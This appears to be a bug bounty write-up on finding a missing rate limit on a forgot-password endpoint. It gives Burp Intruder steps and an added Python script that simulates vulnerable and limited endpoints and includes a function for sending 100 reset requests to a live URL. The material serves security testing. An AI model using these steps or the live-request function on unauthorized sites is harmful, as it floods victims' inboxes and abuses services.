Hi all, my name is B1ayn and I am a bug bounty hunter. Today I'm going to tell you how I found my first bug bounty.
A missing rate limit means the server does not cap how many times one client can repeat the same action, such as submitting a login form or requesting a password-reset link or OTP. On its own it looks harmless, but it becomes serious when an attacker abuses it, because every sensitive action can then be repeated as fast as the attacker can send requests. Real-life example of a rate limit done right: when you try to log in to your account and get the password wrong 3 or 4 times, the account is locked for some hours.

Rate limiting is easy to test on the forgot-password link, the registration page and OTP sending. Any action that sends a mail or an SMS, or checks a code, on every request is a good place to look.
1. Capture the outgoing forgot-password request with Burp Suite.
2. Send it to Intruder.
Click Clear § to remove the automatic payload positions, then select only the 0.3 in the Accept-Language header and click Add §, so the header reads Accept-Language: en-US,en;q=§0.3§. This header has no effect on the reset logic; changing it just makes every repeated request slightly different.
3. Go to the Payloads tab and choose Numbers as the payload type.
Set From 1, To 100 (the number of reset links you want to trigger) and Step 1.
Start Attack, then watch the Status column: if the responses stay 200 instead of turning into 429 or an error after the first few requests, the endpoint is not rate limited.
Wow!! We received 100 mails in just 2 minutes.
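The same attack as a script, added here as an example and not code from the original post. It builds the 100 request variants the way the Intruder Numbers payload does (only the q-value in Accept-Language changes), then fires them at a simulated forgot-password endpoint twice: once with no rate limit, which mails on every request like the site above, and once with an assumed sliding-window limit of 5 requests per 10 minutes per address, which is the behaviour you should expect to see on a fixed target. The request body, the thresholds and the `run_live` target URL are assumptions for illustration; only use `run_live` against a site you are authorized to test.

```python
"""Added example: automate the Burp Intruder rate-limit test on a
forgot-password endpoint and compare a vulnerable target with a
rate-limited one. Request shape and limits are assumptions."""
import time
import urllib.error
import urllib.request
from collections import Counter, defaultdict, deque

# Constructed stand-in for the request captured in Burp (step 1).
BASE_HEADERS = {
    "Content-Type": "application/x-www-form-urlencoded",
    "Accept-Language": "en-US,en;q=0.3",   # the value marked as the payload position
}
BODY = b"email=victim%40example.com"       # constructed sample body


def build_variants(base_headers, count):
    """Return `count` header dicts in which only the q-value changes (1, 2, ...),
    mirroring the Intruder Numbers payload. The server ignores this header for
    the reset logic; varying it only makes each repeat a distinct request."""
    variants = []
    for n in range(1, count + 1):
        hdrs = dict(base_headers)
        hdrs["Accept-Language"] = f"en-US,en;q={n}"
        variants.append(hdrs)
    return variants


class ForgotPasswordEndpoint:
    """Simulated target. With max_per_window=None it behaves like the site in
    the post and mails on every request; with a limit it keeps a sliding window
    of request times per recipient address and answers 429 once it is full."""

    def __init__(self, max_per_window=None, window_seconds=600):
        self.max_per_window = max_per_window
        self.window = window_seconds
        self.mails_sent = 0
        self._hits = defaultdict(deque)

    def handle(self, headers, body, now=None):
        now = time.monotonic() if now is None else now
        email = body.decode().split("=", 1)[1]   # key the limit on the address
        if self.max_per_window is not None:
            q = self._hits[email]
            while q and now - q[0] > self.window:  # drop hits outside the window
                q.popleft()
            if len(q) >= self.max_per_window:
                return 429
            q.append(now)
        self.mails_sent += 1                        # a reset mail goes out
        return 200


def run_attack(endpoint, variants, body=BODY):
    """Send every variant to the simulated endpoint; return a Counter of status codes."""
    return Counter(endpoint.handle(h, body) for h in variants)


def run_live(url, variants, body=BODY, timeout=10):
    """Same attack against a real URL (assumed target; authorized testing only)."""
    codes = Counter()
    for hdrs in variants:
        req = urllib.request.Request(url, data=body, headers=hdrs, method="POST")
        try:
            with urllib.request.urlopen(req, timeout=timeout) as resp:
                codes[resp.status] += 1
        except urllib.error.HTTPError as e:
            codes[e.code] += 1
    return codes


if __name__ == "__main__":
    variants = build_variants(BASE_HEADERS, 100)
    vulnerable = ForgotPasswordEndpoint()
    print("no rate limit:", dict(run_attack(vulnerable, variants)),
          "mails sent:", vulnerable.mails_sent)
    fixed = ForgotPasswordEndpoint(max_per_window=5)
    print("rate limited: ", dict(run_attack(fixed, variants)),
          "mails sent:", fixed.mails_sent)
```

The vulnerable run returns 100 responses of 200 and sends 100 mails, which is what the Intruder result above shows; the limited run stops at 5 mails and answers 429 for the other 95. When you read Intruder results, that status-code split is the check that tells you whether a limit exists at all.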
Follow me for more writeups!